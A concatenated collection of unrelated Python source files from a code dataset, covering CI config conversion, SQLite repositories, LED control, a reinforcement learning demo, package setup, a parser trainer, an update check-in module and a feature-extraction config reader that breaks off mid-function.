clean_dict = {'before': True}
if 'clean' in git: # after has already been added
git['clean'].update(clean_dict)
else: # Need to create dict for git['clean']
git['clean'] = clean_dict
elif extension.tag == 'hudson.plugins.git.extensions.impl.CleanCheckout':
clean_dict = {'after': True}
if 'clean' in git: # before has already been added
git['clean'].update(clean_dict)
else: # Need to create dict for git['clean']
git['clean'] = clean_dict
elif extension.tag == 'hudson.plugins.git.extensions.impl.PathRestriction':
paths = {'includedRegions': 'included-regions',
'excludedRegions': 'excluded-regions'}
for jxml, jjb in list(paths.items()):
if extension.find(jxml) is not None:
regions = extension.find(jxml).text
if regions is not None:
git[jjb] = regions.splitlines()
else:
raise NotImplementedError("%s not supported" % extension.tag)
else:
raise NotImplementedError("cannot handle XML %s" % child.tag)
parent.append({'git': git})
def mercurialscm(top, parent):
hg = {}
for child in top:
if child.tag == 'source':
hg['url'] = child.text
elif child.tag == 'credentialsId':
hg['credentials-id'] = child.text
elif child.tag == 'revisionType':
hg['revision-type'] = child.text.lower()
elif child.tag == 'revision':
hg['revision'] = child.text
elif child.tag == 'modules':
pass
elif child.tag == 'clean':
hg['clean'] = (child.text == 'true')
elif child.tag == 'subdir':
hg['subdir'] = child.text
elif child.tag == 'disableChangeLog':
hg['disable-changelog'] = (child.text == 'true')
elif child.tag == 'browser' and 'class' in child.attrib:
browser_class = child.attrib['class']
if browser_class == 'hudson.plugins.mercurial.browser.BitBucket':
hg['browser'] = 'bitbucketweb'
elif browser_class == 'hudson.plugins.mercurial.browser.FishEye':
hg['browser'] = 'fisheye'
elif browser_class == 'hudson.plugins.mercurial.browser.GoogleCode':
hg['browser'] = 'googlecode'
elif browser_class == 'hudson.plugins.mercurial.browser.HgWeb':
hg['browser'] = 'hgweb'
elif browser_class == 'hudson.plugins.mercurial.browser.Kallithea':
# Not supported by JJB
raise NotImplementedError("%s is not yet supported by jenkins-job-builder." %
browser_class)
elif browser_class == 'hudson.plugins.mercurial.browser.KilnHG':
hg['browser'] = 'kilnhg'
elif browser_class == 'hudson.plugins.mercurial.browser.RhodeCode':
hg['browser'] = 'rhodecode'
elif browser_class == 'hudson.plugins.mercurial.browser.RhodeCodeLegacy':
hg['browser'] = 'rhodecode-pre-1.2'
if child.find('url') is not None:
hg['browser-url'] = child.find('url').text
parent.append({'hg': hg})
def subversionscm(top, parent):
# Parameters:
# url (str) - URL of the svn repository
# basedir (str) - location relative to the workspace root to checkout to (default '.')
# credentials-id (str) - optional argument to specify the ID of credentials to use
# repo-depth (str) - Repository depth. Can be one of 'infinity', 'empty',
# 'files', 'immediates' or 'unknown'. (default 'infinity')
# ignore-externals (bool) - Ignore Externals. (default false)
# workspaceupdater (str) - optional argument to specify
# workspaceupdater -
# optional argument to specify how to update the workspace (default wipeworkspace)
# supported values:
# wipeworkspace - deletes the workspace before checking out
# revertupdate - do an svn revert then an svn update
# emulateclean - delete unversioned/ignored files then update
# update - do an svn update as much as possible
# excluded-users (list(str)) - list of users to ignore revisions from when polling for changes (if polling is enabl
# included-regions (list(str)) - list of file/folders to include (optional)
# excluded-regions (list(str)) - list of file/folders to exclude (optional)
# excluded-commit-messages (list(str)) - list of commit messages to exclude (optional)
# exclusion-revprop-name (str) - revision svn-property to ignore (optional)
# ignore-property-changes-on-directories (bool) - ignore svn-property only changes of directories (default false)
# filter-changelog (bool) - If set Jenkins will apply the same inclusion and exclusion patterns for displaying chan
# repos (list) - list of repositories to checkout (optional)
# viewvc-url (str) -
# URL of the svn web interface (optional)
# Repo:
# url (str) - URL for the repository
# basedir (str) - Location relative to the workspace root to checkout to (default '.')
# credentials-id - optional ID of credentials to use
# repo-depth - Repository depth. Can be one of 'infinity', 'empty', 'files', 'immediates' or 'unknown'. (de
# ignore-externals - Ignore Externals. (default false)
svn = {}
for child in top:
if child.tag == 'remote':
svn['url'] = child.text if child.text else ''
elif child.tag == 'local':
svn['basedir'] = child.text if child.text else ''
elif child.tag == 'credentialsId':
svn['credentials-id'] = child.text if child.text else ''
elif child.tag == 'depthOption':
svn['repo-depth'] = child.text if child.text else ''
elif child.tag == 'ignoreExternalsOption':
svn['ignore-externals'] = (child.text == 'true')
elif child.tag == 'workspaceUpdater':
# see
# https://github.com/openstack-infra/jenkins-job-builder/blob/master/jenkins_jobs/modules/scm.py#L835
if child.attrib['class'] == 'hudson.scm.subversion.CheckoutUpdater':
svn['workspaceupdater'] = 'wipeworkspace'
elif child.attrib['class'] == 'hudson.scm.subversion.UpdateWithRevertUpdater':
svn['workspaceupdater'] = 'revertupdate'
elif child.attrib['class'] == 'hudson.scm.subversion.UpdateWithCleanUpdater':
svn['workspaceupdater'] = 'emulateclean'
elif child.attrib['class'] == 'hudson.scm.subversion.UpdateUpdater':
svn['workspaceupdater'] = 'update'
elif child.tag == 'includedRegions':
svn['included-regions'] = child.text if child.text else ''
elif child.tag == 'excludedRegions':
svn['excluded-regions'] = child.text if child.text else ''
elif child.tag == 'excludedUsers':
svn['excluded-users'] = child.text if child.text else ''
elif child.tag == 'excludedCommitMessages':
svn['excluded-commit-messages'] = child.text if child.text else ''
elif child.tag == 'excludedRevprop':
svn['exclusion-revprop-name'] = child.text if child.text else ''
elif child.tag == 'ignoreDirPropChanges':
svn['ignore-property-changes-on-directories'] = \
(child.text == 'true')
elif child.tag == 'filterChangelog':
svn['filter-changelog'] = (child.text == 'true')
elif child.tag == 'locations':
if len(list(child)) > 0:
repos = []
for c in child.getchildren():
repo = {}
for r in c:
if r.tag == 'remote':
repo['url'] = r.text if r.text else ''
elif r.tag == 'local':
repo['basedir'] = r.text if r.text else ''
elif r.tag == 'credentialsId':
repo['credentials-id'] = r.text if r.text else ''
elif r.tag == 'depthOption':
repo['repo-depth'] = r.text if r.text else ''
elif r.tag == 'ignoreExternalsOption':
repo['ignore-externals'] = (r.text == 'true')
repos.append(repo)
svn['repos'] = repos
else:
raise NotImplementedError("%s not supported tag in svn scm" % child.tag)
parent.append({'svn': svn})
|
StarcoderdataPython
|
245281
|
<filename>src/fbsrankings/infrastructure/sqlite/write/record.py<gh_stars>0
import sqlite3
from typing import List
from typing import Optional
from typing import Tuple
from typing import Union
from uuid import UUID
from pypika import Parameter
from pypika import Query
from pypika.queries import QueryBuilder
from fbsrankings.common import EventBus
from fbsrankings.domain import SeasonID
from fbsrankings.domain import TeamID
from fbsrankings.domain import TeamRecord
from fbsrankings.domain import TeamRecordID
from fbsrankings.domain import TeamRecordRepository as BaseRepository
from fbsrankings.domain import TeamRecordValue
from fbsrankings.event import TeamRecordCalculatedEvent
from fbsrankings.infrastructure.sqlite.storage import TeamRecordTable
from fbsrankings.infrastructure.sqlite.storage import TeamRecordValueTable
SqliteParam = Union[None, int, float, str, bytes]
class TeamRecordRepository(BaseRepository):
def __init__(
self, connection: sqlite3.Connection, cursor: sqlite3.Cursor, bus: EventBus,
) -> None:
super().__init__(bus)
self._connection = connection
self._cursor = cursor
self._record_table = TeamRecordTable().table
self._value_table = TeamRecordValueTable().table
bus.register_handler(TeamRecordCalculatedEvent, self._handle_record_calculated)
def get(self, id_: TeamRecordID) -> Optional[TeamRecord]:
cursor = self._connection.cursor()
cursor.execute(
self._query().where(self._record_table.UUID == Parameter("?")).get_sql(),
[str(id_.value)],
)
row = cursor.fetchone()
cursor.close()
return self._to_record(row) if row is not None else None
def find(self, season_id: SeasonID, week: Optional[int]) -> Optional[TeamRecord]:
query = self._query().where(self._record_table.SeasonID == Parameter("?"))
params: List[SqliteParam] = [str(season_id.value)]
if week is not None:
query = query.where(self._record_table.Week == Parameter("?"))
params.append(week)
else:
query = query.where(self._record_table.Week.isnull())
cursor = self._connection.cursor()
cursor.execute(
query.get_sql(), params,
)
row = cursor.fetchone()
cursor.close()
return self._to_record(row) if row is not None else None
def _query(self) -> QueryBuilder:
return Query.from_(self._record_table).select(
self._record_table.UUID,
self._record_table.SeasonID,
self._record_table.Week,
)
def _to_record(self, row: Tuple[str, str, Optional[int]]) -> TeamRecord:
cursor = self._connection.cursor()
cursor.execute(
Query.from_(self._value_table)
.select(
self._value_table.TeamRecordID,
self._value_table.TeamID,
self._value_table.Wins,
self._value_table.Losses,
)
.where(self._value_table.TeamRecordID == Parameter("?"))
.get_sql(),
[row[0]],
)
rows = cursor.fetchall()
cursor.close()
values = [self._to_value(row) for row in rows if row is not None]
return TeamRecord(
self._bus,
TeamRecordID(UUID(row[0])),
SeasonID(UUID(row[1])),
row[2],
values,
)
@staticmethod
def _to_value(row: Tuple[str, str, int, int]) -> TeamRecordValue:
return TeamRecordValue(TeamID(UUID(row[1])), row[2], row[3])
def _handle_record_calculated(self, event: TeamRecordCalculatedEvent) -> None:
query = (
Query.from_(self._record_table)
.select(self._record_table.UUID)
.where(self._record_table.SeasonID == Parameter("?"))
)
params: List[SqliteParam] = [str(event.season_id)]
if event.week is not None:
query = query.where(self._record_table.Week == Parameter("?"))
params.append(event.week)
else:
query = query.where(self._record_table.Week.isnull())
self._cursor.execute(
query.get_sql(), params,
)
row = self._cursor.fetchone()
if row is not None:
self._cursor.execute(
Query.from_(self._value_table)
.delete()
.where(self._value_table.TeamRecordID == Parameter("?"))
.get_sql(),
[row[0]],
)
self._cursor.execute(
Query.from_(self._record_table)
.delete()
.where(self._record_table.UUID == Parameter("?"))
.get_sql(),
[row[0]],
)
self._cursor.execute(
Query.into(self._record_table)
.columns(
self._record_table.UUID,
self._record_table.SeasonID,
self._record_table.Week,
)
.insert(Parameter("?"), Parameter("?"), Parameter("?"))
.get_sql(),
[str(event.id_), str(event.season_id), event.week],
)
insert_sql = (
Query.into(self._value_table)
.columns(
self._value_table.TeamRecordID,
self._value_table.TeamID,
self._value_table.Wins,
self._value_table.Losses,
)
.insert(Parameter("?"), Parameter("?"), Parameter("?"), Parameter("?"))
.get_sql()
)
for value in event.values:
self._cursor.execute(
insert_sql,
[str(event.id_), str(value.team_id), value.wins, value.losses],
)
|
StarcoderdataPython
|
9666115
|
def resolve():
'''
code here
'''
X = int(input())
X = X//100
if X < 6:
res = 8
elif X < 8:
res = 7
elif X < 10:
res = 6
elif X < 12:
res = 5
elif X < 14:
res = 4
elif X < 16:
res = 3
elif X < 18:
res = 2
else:
res = 1
print(res)
if __name__ == "__main__":
resolve()
|
StarcoderdataPython
|
3577475
|
<filename>python/led_fun.py
# Simple test for NeoPixels on Raspberry Pi
import time
import board
import neopixel
# Choose an open pin connected to the Data In of the NeoPixel strip, i.e. board.D18
# NeoPixels must be connected to D10, D12, D18 or D21 to work.
pixel_pin = board.D18
# The number of NeoPixels
num_pixels = 316
# The order of the pixel colors - RGB or GRB. Some NeoPixels have red and green reversed!
# For RGBW NeoPixels, simply change the ORDER to RGBW or GRBW.
ORDER = neopixel.RGB
pixels = neopixel.NeoPixel(
pixel_pin, num_pixels, brightness=0.2, auto_write=False #, pixel_order=ORDER
)
steps = 16
# r = range of pixels to iterate over
# c = color to set the pixels
def sequence(r, c):
for i in r:
#pixels[i] = c
# set the next *steps* pixels too
for j in range(steps):
if(i+j < num_pixels and i+j >= 0):
pixels[i+j] = c
pixels.write()
#time.sleep(.1)
#sequence(range(0, num_pixels, steps), (255, 0, 0))
#sequence(range(num_pixels, -1, -steps), (0, 255, 0))
#sequence(range(0, num_pixels, steps), (0, 0, 255))
#sequence(range(num_pixels, -1, -steps), (255, 255, 255))
#sequence(range(0, num_pixels, steps), (0, 0, 0))
while True:
sequence(range(60, num_pixels, steps), (255, 0, 0))
sequence(range(num_pixels, 60, -steps), (0, 255, 0))
sequence(range(60, num_pixels, steps), (0, 0, 255))
sequence(range(num_pixels, 60, -steps), (255, 255, 255))
sequence(range(60, num_pixels, steps), (0, 0, 0))
sequence(range(num_pixels, 60, -steps), (200, 10, 20))
|
StarcoderdataPython
|
8015409
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright © 2013 OnlineGroups.net and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
from datetime import datetime
from operator import and_
from pytz import UTC
import sqlalchemy as sa
from zope.sqlalchemy import mark_changed
from gs.database import getTable, getSession
class RequestQuery(object):
def __init__(self):
self.requestTable = getTable('user_group_member_request')
def add_request(self, requestId, userId, message, siteId, groupId):
now = datetime.now(UTC)
i = self.requestTable.insert()
d = {"request_id": requestId, "user_id": userId,
"message": message, "site_id": siteId,
"group_id": groupId, "request_date": now}
session = getSession()
session.execute(i, params=d)
mark_changed(session)
def decline_request(self, userId, groupId, adminId):
self.update_request(userId, groupId, adminId, False)
def accept_request(self, userId, groupId, adminId):
self.update_request(userId, groupId, adminId, True)
def update_request(self, userId, groupId, adminId, response):
u = self.requestTable.update(and_(and_(
self.requestTable.c.user_id == userId,
self.requestTable.c.group_id == groupId),
self.requestTable.c.response_date == None))
now = datetime.now(UTC)
session = getSession()
session.execute(u, params={'responding_user_id': adminId,
'response_date': now,
'accepted': response})
mark_changed(session)
def current_requests(self, groupId, siteId):
s = self.requestTable.select(
order_by=sa.desc(self.requestTable.c.request_date))
s.append_whereclause(self.requestTable.c.group_id == groupId)
s.append_whereclause(self.requestTable.c.site_id == siteId)
s.append_whereclause(self.requestTable.c.response_date == None)
session = getSession()
r = session.execute(s)
retval = []
seen = set()
if r.rowcount >= 1:
for x in r:
if x['user_id'] not in seen:
seen.add(x['user_id'])
rd = {'request_id': x['request_id'],
'user_id': x['user_id'],
'request_date': x['request_date'],
'message': x['message']}
retval.append(rd)
return retval
def count_current_requests(self, groupId, siteId):
cols = [sa.func.count(self.requestTable.c.request_id)]
s = sa.select(cols)
s.append_whereclause(self.requestTable.c.group_id == groupId)
s.append_whereclause(self.requestTable.c.site_id == siteId)
s.append_whereclause(self.requestTable.c.response_date == None)
session = getSession()
r = session.execute(s)
retval = r.scalar()
if retval is None:
retval = 0
assert retval >= 0
return retval
|
StarcoderdataPython
|
1685592
|
"""
Python 3.9 стартовая программа на Python по изучению обучения с подкреплением - Reinforcement Learning
Название файла 00. start.py
Version: 0.1
Author: <NAME>
Date: 2021-12-19
воспользуемся одной из тестовых игр OpenAI, в частности, со средой «MountainCar-v0»
"""
import gym # библиотека OpenAI с простыми играми
env = gym.make("MountainCar-v0") # обращаемся к виртуальной среде (инициализировать среду)
env.reset() # В случае с этим тренажерным залом наблюдения возвращаются из сбросов и шагов.
print(env.action_space.n) # Для различных сред мы можем запросить у них, сколько действий / ходов возможно?
# В этом случае мы можем передать «3» действия. Это означает, что когда мы шагаем по среде, мы можем передавать 0,
# 1 или 2 в качестве нашего «действия» для каждого шага. Каждый раз, когда мы это делаем, среда будет возвращать нам
# новое состояние, награду, независимо от того, завершена / завершена среда, а затем любую дополнительную информацию,
# которая может быть у некоторых env.
# 0 означает толчок влево, 1 - оставаться на месте, а 2 - толкать вправо.
print(env.reset()) # Вы получите что-то вроде того [-0.4826636 0. ], что является начальным состоянием наблюдения.
done = False
while not done:
action = 2 # always go right! 0 означает толчок влево, 1 - оставаться на месте, а 2 - толкать вправо.
env.step(action)
env.render()
# Как видите, несмотря на то, что эту машину постоянно просят ехать направо, мы видим, что у нее просто нет сил,
# чтобы это сделать. Вместо этого нам нужно на самом деле набрать обороты, чтобы достичь этого флага. Для этого нам
# нужно двигаться взад и вперед, чтобы набрать обороты. Мы могли бы запрограммировать функцию, которая будет
# выполнять эту задачу за нас, или мы можем использовать Q-обучение для ее решения!
|
StarcoderdataPython
|
1905515
|
import pandas as pd
from db_pool.mysqlhelper import MySqLHelper
from matplotlib import pyplot as plt
db = MySqLHelper()
mertics1_sql = "SELECT pharmacy_order.store_id, SUM(orderdetail.final_total) AS 'October 2021 Sales' FROM orderdetail INNER JOIN pharmacy_order ON pharmacy_order.order_id=orderdetail.order_id INNER JOIN pharmacy ON pharmacy_order.store_id=pharmacy.store_id WHERE orderdetail.order_time >= 1633046400 & orderdetail.order_time <= 1635724799 GROUP BY pharmacy_order.store_id;"
mertics1_sql_result = list(db.selectall(sql=mertics1_sql))
for i in range(len(mertics1_sql_result)):
mertics1_sql_result[i] = list(mertics1_sql_result[i])
mertics1_sql_result[i][1] = round(mertics1_sql_result[i][1], 2)
df = pd.DataFrame(mertics1_sql_result, columns =['store_number', 'Sales'])
plt.figure(figsize=(6, 6))
explode = (0, 0, 0, 0, 0)
plt.title("Sales of Pharmacies in October 2021 Grouped by Store Number")
colors = ("SkyBlue", "SlateGrey", "SteelBlue", "Silver", "cornflowerblue")
labels = 'Store 1', 'Store 2', 'Store 3', 'Store 4', 'Store 5'
plt.pie(x=df.Sales, labels=labels,explode=explode, colors=colors, autopct="%.0f%%", counterclock=False, shadow=False)
plt.show()
mertics2_sql = "SELECT order_medicine.medicine_sku, SUM(order_medicine.amount) AS total_sale_quantity FROM order_medicine INNER JOIN medicine ON medicine.medicine_sku=order_medicine.medicine_sku GROUP BY medicine.medicine_sku ORDER BY total_sale_quantity DESC;"
mertics2_sql_result = db.selectall(sql=mertics2_sql)
print(mertics2_sql_result)
|
StarcoderdataPython
|
5026474
|
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='darktree',
version='0.1.0',
description='Yosys JSON Netlist Hierarchical Viewer',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/nturley/darktree',
author='<NAME>',
author_email='<EMAIL>',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Digital Hardware Engineers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
keywords='netlist yosys hierarchy',
packages=find_packages(exclude=['doc', 'test']),
python_requires='>=3.0',
install_requires=['QDarkStyle', 'PySide2'],
package_data={
'darktree': ['main.ui'],
},
entry_points={
'console_scripts': [
'darktree=darktree:main.main',
],
},
)
|
StarcoderdataPython
|
1755413
|
for _ in range(int(input())):
m,s = map(int,input().split())
print(m//s)
|
StarcoderdataPython
|
4823609
|
import click
import pygments
import pygments.formatters
from suricata_prettifier.beautify import beautify_file
from suricata_prettifier.lexer import SuricataLexer
@click.command(context_settings=dict(
ignore_unknown_options=True,
))
@click.option('-f', '--formatter', default='terminal')
@click.argument('input', type=click.File('r'), default='-')
@click.argument('output', type=click.File('w'), default='-')
@click.argument('formatter_options', nargs=-1, type=click.UNPROCESSED)
def prettify(input, output, formatter, formatter_options=()):
lexer = SuricataLexer()
default_options = dict(
full=True,
style='vim',
prestyles='white-space: pre-wrap;',
)
options = {
**default_options,
**dict(option.split('=', 1) for option in formatter_options),
}
formatter = pygments.formatters.get_formatter_by_name(formatter, **dict(options))
source = beautify_file(input)
pygments.highlight(source, lexer, formatter, output)
if __name__ == '__main__':
prettify()
|
StarcoderdataPython
|
6534607
|
from __future__ import print_function
import statemachine as fsm
class TrafficLight(fsm.Machine):
initial_state = 'red'
count = 0
@fsm.after_transition('red', 'green')
def chime(self):
print('GO GO GO')
self.count += 1
@fsm.after_transition('*', 'red')
def apply_brakes(self):
self.stopped = True
@fsm.event
def cycle(self):
yield 'red', 'green'
yield 'green', 'yellow'
yield 'yellow', 'red'
|
StarcoderdataPython
|
6410952
|
from abc import ABC, abstractmethod
from typing import List, Union
import torch
from torch.optim.optimizer import Optimizer
from parseridge.corpus.corpus import Corpus
from parseridge.corpus.training_data import ConLLDataset
from parseridge.parser.modules.data_parallel import Module
from parseridge.parser.training.callbacks.base_callback import Callback
from parseridge.parser.training.callbacks.handler import CallbackHandler
from parseridge.parser.training.callbacks.model_training_callback import (
ModelTrainingCallback,
)
from parseridge.parser.training.hyperparameters import Hyperparameters
from parseridge.utils.logger import LoggerMixin
class Trainer(LoggerMixin, ABC):
def __init__(
self, model: Module, optimizer: Optimizer, callbacks: List[Callback] = None
):
self.model = model
self.optimizer = optimizer
self.callback_handler = CallbackHandler(
callbacks=callbacks or [], model=self.model, optimizer=self.optimizer
)
self.callback_handler.register_callback(ModelTrainingCallback())
self.last_epoch = 0
def register_callbacks(self, callbacks: List[Callback]) -> None:
for callback in callbacks:
self.callback_handler.register_callback(callback)
@abstractmethod
def fit(
self,
epochs: int,
training_data: Union[Corpus, ConLLDataset],
hyper_parameters: Hyperparameters = None,
**kwargs,
) -> None:
pass
def fit_one_cycle(
self,
training_data: Union[Corpus, ConLLDataset],
hyper_parameters: Hyperparameters = None,
**kwargs,
) -> None:
return self.fit(
epochs=1,
training_data=training_data,
hyper_parameters=hyper_parameters,
**kwargs,
)
def learn(self, loss: torch.Tensor) -> None:
self.callback_handler.on_loss_begin(loss=loss)
# Compute the gradients
self.callback_handler.on_backward_begin()
loss.backward()
self.callback_handler.on_backward_end()
# Update the weights
self.optimizer.step()
self.callback_handler.on_step_end()
# Clear all previous gradients
self.optimizer.zero_grad()
|
StarcoderdataPython
|
6554109
|
<reponame>codecakes/algorithms_monk
#!/bin/python
"""
Your local library needs your help! Given the expected and actual return dates for a library book, create a program that calculates the fine (if any). The fee structure is as follows:
If the book is returned on or before the expected return date, no fine will be charged (i.e.: .
If the book is returned after the expected return day but still within the same calendar month and year as the expected return date, .
If the book is returned after the expected return month but still within the same calendar year as the expected return date, the .
If the book is returned after the calendar year in which it was expected, there is a fixed fine of .
Input Format
The first line contains space-separated integers denoting the respective , , and on which the book was actually returned.
The second line contains space-separated integers denoting the respective , , and on which the book was expected to be returned (due date).
Constraints
Output Format
Print a single integer denoting the library fine for the book received as input.
Sample Input
9 6 2015
6 6 2015
Sample Output
45
"""
def isLeap(yy):
if yy%4 != 0: return 365
if yy%100 != 0: return 366
if yy%400 != 0: return 365
return 366
def month_days(m, y):
return 28 if (m==2 and not isLeap(y)) \
else (29 if (m ==2 and isLeap(y)) \
else (31 if (m%2 == 1 and m<8) \
else (31 if m%2 == 0 and 12>=m>7 \
else (30 if m%2 == 1 and 12>=m>7 \
else 30))))
def fine_due(d1,m1,y1,d2,m2,y2):
# d1,m1,y1 - actual
# d2,m2,y2 - due
# tot_days = m_count = 0
if y1<y2:
return 0
if y1>y2:
# m1_days = month_days(m1, y1)
# m2_days = month_days(m2, y2) - d2 - 1
# yr_days = 365 if not isLeap(y2) else 366
# m_count += 1 if m2_days%month_days(m2, y2) == 0 else 0
#for m in xrange(m2+1, 13):
# tot_days += month_days(m, y2)
# m_count += 1
# tot_days += m2_days
#
# for m in xrange(1, m1):
# tot_days += month_days(m, y1)
# m_count += 1
# tot_days += d1
# print tot_days
#return 10000 if tot_days > yr_days else 500 * m_count
return 10000
if m1<m2:
return 0
if m1>m2:
return 500 * (m1-m2)
if d1<d2:
return 0
if d1>d2:
return 15 * (d1-d2)
return 0
d1,m1,y1 = raw_input().strip().split(' ')
d1,m1,y1 = [int(d1),int(m1),int(y1)]
d2,m2,y2 = raw_input().strip().split(' ')
d2,m2,y2 = [int(d2),int(m2),int(y2)]
print fine_due(d1,m1,y1,d2,m2,y2)
|
StarcoderdataPython
|
394720
|
<filename>practicas/voice_call/t2.py
import pyaudio
p = pyaudio.PyAudio()
for i in range(p.get_device_count()):#list all available audio devices
dev = p.get_device_info_by_index(i)
print((i,dev['name'],dev['maxInputChannels']))
|
StarcoderdataPython
|
1864844
|
<filename>LIVE/labs/tmp.py
alist = [
"351",
"222",
"143"
]
def f0(x): return x[0]
def f1(x): return x[1]
def f2(x): return x[2]
sort_by_index = [f0, f1, f2]
sorted_st = sorted(alist, key=sort_by_index[2])
print( sorted_st )
# print( student_tuples.sort(reverse=False))
|
StarcoderdataPython
|
1822949
|
<reponame>theshiv303/kegbot-server
"""Checks a central server for updates."""
from builtins import str
from django.core.cache import cache
from django.utils import timezone
from pykeg.core import models
from pykeg.core import util
from pykeg.core.tasks import core_checkin_task
from pykeg.core.util import SuppressTaskErrors
import datetime
import logging
import os
import requests
FIELD_REG_ID = "reg_id"
FIELD_PRODUCT = "product"
FIELD_VERSION = "version"
FIELD_INTERVAL_MILLIS = "interval_millis"
FIELD_UPDATE_AVAILABLE = "update_available"
FIELD_UPDATE_REQUIRED = "update_required"
FIELD_UPDATE_TITLE = "update_title"
FIELD_UPDATE_URL = "update_url"
FIELD_NEWS = "news"
PRODUCT = "kegbot-server"
CHECKIN_URL = os.getenv("CHECKIN_URL", None) or "https://kegbotcheckin.appspot.com/checkin"
CHECKIN_INTERVAL = datetime.timedelta(hours=12)
KEY_LAST_CHECKIN_TIME = "checkin:last_checkin_time"
KEY_LAST_CHECKIN_RESPONSE = "checkin:last_checkin_response"
LOGGER = logging.getLogger("checkin")
logging.getLogger("requests").setLevel(logging.WARNING)
class CheckinError(Exception):
"""Base exception."""
def get_last_checkin():
"""Returns tuple of (time, data), or (None, None) if not available."""
return cache.get(KEY_LAST_CHECKIN_TIME), cache.get(KEY_LAST_CHECKIN_RESPONSE)
def set_last_checkin(when, response_data=None):
"""Sets last checkin date and time."""
cache.set(KEY_LAST_CHECKIN_TIME, when, timeout=None)
cache.set(KEY_LAST_CHECKIN_RESPONSE, response_data, timeout=None)
def schedule_checkin(force=False):
"""Schedules a checkin if needed and allowed.
Args
force: if True, ignore last checkin time.
Returns
True if a checkin was scheduled.
"""
kbsite = models.KegbotSite.get()
if not kbsite.check_for_updates:
LOGGER.debug("schedule_checkin: not scheduling: checkin disabled")
return False
last_checkin_time, last_checkin_data = get_last_checkin()
now = timezone.now()
if not last_checkin_time or (now - last_checkin_time) > CHECKIN_INTERVAL or force:
with SuppressTaskErrors(LOGGER):
LOGGER.info("schedule_checkin: scheduling checkin")
core_checkin_task.delay()
return True
return False
def checkin(url=CHECKIN_URL, product=PRODUCT, timeout=None, quiet=False):
"""Issue a single checkin to the checkin server.
No-op if kbsite.check_for_updates is False.
Returns
A checkin response dictionary, or None if checkin is disabled.
Raises
ValueError: On malformed reponse.
requests.RequestException: On error talking to server.
"""
kbsite = models.KegbotSite.get()
if not kbsite.check_for_updates:
LOGGER.debug("Upgrade check is disabled")
return
site = models.KegbotSite.get()
reg_id = site.registration_id
headers = {
"User-Agent": util.get_user_agent(),
}
payload = {
FIELD_PRODUCT: product,
FIELD_REG_ID: reg_id,
FIELD_VERSION: util.get_version(),
}
try:
LOGGER.debug("Checking in, url=%s reg_id=%s" % (url, reg_id))
result = requests.post(url, data=payload, headers=headers, timeout=timeout).json()
new_reg_id = result.get(FIELD_REG_ID)
if new_reg_id != reg_id:
LOGGER.debug("Updating reg_id=%s" % new_reg_id)
site.registration_id = new_reg_id
site.save()
LOGGER.debug("Checkin result: %s" % str(result))
if not quiet:
LOGGER.info("Checkin complete, reg_id=%s" % (reg_id,))
set_last_checkin(timezone.now(), result)
return result
except (ValueError, requests.RequestException) as e:
if not quiet:
LOGGER.warning("Checkin error: %s" % str(e))
raise CheckinError(e)
|
StarcoderdataPython
|
8068956
|
width = 2448
height = 2048
i = 0
for image in images:
xml_file = open(str(i)+".xml","w+")
xml_file.write("<annotation><filename>"+str(i)+".png</filename>\
<size><width>"+str(width)+"</width><height>"+str(height)+"</height>\
<depth>3</depth></size>\
<object><pose>Frontal</pose>\
<truncated>0</truncated>\
<difficult>0</difficult></object></annotation>")
xml_file.close()
|
StarcoderdataPython
|
9790156
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
# ----------------------------------------------------------------------------
from spack import *
class RCa(RPackage):
"""Simple, Multiple and Joint Correspondence Analysis
Computation and visualization of simple, multiple and joint
correspondence analysis."""
homepage = "http://www.carme-n.org/?sec=ca"
url = "https://cloud.r-project.org/src/contrib/ca_0.71.1.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/ca"
version('0.71.1', sha256='040c2fc94c356075f116cc7cd880530b3c9e02206c0035182c03a525ee99b424')
depends_on('[email protected]:', type=('build', 'run'))
|
StarcoderdataPython
|
5195969
|
<gh_stars>0
from json import load
from os import path, getcwd
from feature.feature_defintions.Histogram import Histogram
from feature.feature_defintions.AlexNet import AlexNet
from feature.feature_defintions.VGGNet import VGGNet
from feature.feature_defintions.ResNet50 import ResNet50
from feature.feature_defintions.Colourization import Colourization
from feature.feature_defintions.VAE import VAE
from feature.feature_defintions.MyModel import MyModel
from feature.feature_tests.test_functions import *
# TODO:
# Logging
# Timing script
# Output multiple CSV files for 1 run (i.e. models trained to different
# epochs)
# Constants
HISTOGRAM_BINS = 256
# Parse feature config JSON file. Config structure:
#
# {
# "input_path_base": "path/to/input/data/",
# "input_name": "data_directory_name/",
# "output_path_base": "path/to/output/",
# "output_name": "name_of_index.csv",
# "feature_path": "path/to/model/", (leave blank for histogram features)
# "feature_name": "name_of_feature"
# }
def feature_json_read():
config_path = path.join(getcwd(), 'feature_params.json')
assert(path.isfile(config_path)), "{} does not exist".format(config_path)
print("Feature config file path: ", config_path)
with open(config_path) as f:
config_file = load(f)
input_path = config_file['input_path_base']
input_name = config_file['input_name']
output_path = config_file['output_path_base']
output_name = config_file['output_name']
feature_path = config_file['feature_path']
feature_name = config_file['feature_name']
layer = config_file['layer']
config_dict = dict()
config_dict['input'] = input_path + input_name
config_dict['output'] = output_path + output_name
config_dict['feature_name'] = feature_name
config_dict['feature_path'] = feature_path
config_dict['layer'] = layer
return config_dict
# Instantiate object for requested feature
def feature_object_create(config):
feature_name = config['feature_name']
print(feature_name + " selected")
if 'histogram' in feature_name:
